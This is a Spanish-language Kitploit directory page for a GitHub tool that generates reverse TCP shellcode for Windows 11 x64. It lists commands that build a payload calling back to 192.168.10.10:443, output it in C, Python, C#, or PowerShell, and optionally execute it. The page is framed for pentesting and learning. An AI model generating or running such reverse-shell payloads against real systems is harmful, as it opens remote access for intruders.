Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
shellcode-x64 — Shellcodes para Windows >= 11 x64 | Kitploit
Herramientas/GitHubGitHub/hvictor/shellcode-x64
Generación de PayloadsExplotaciónShellcodePruebas de PenetraciónRed TeamingGeneración de ShellcodeDesarrollo de Payloads
GitHubhvictor/shellcode-x64

shellcode-x64

Shellcodes para Windows >= 11 x64

Ver Repositorio
73hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Shellcode para Microsoft Windows 11 x64

Python Assembly

Este script genera shellcode Reverse TCP para Windows 11 x64 con la técnica PIC.


Uso para generar shellcode

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443

El lenguaje por defecto es shellcode tipo C; también Python, Csharp y PowerShell:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell

Para guardar el archivo:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true

El resultado predeterminado es output.bin:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin

Para probar y ejecutar:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true

Y:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin

Feliz aprendizaje ;)

Descargar herramienta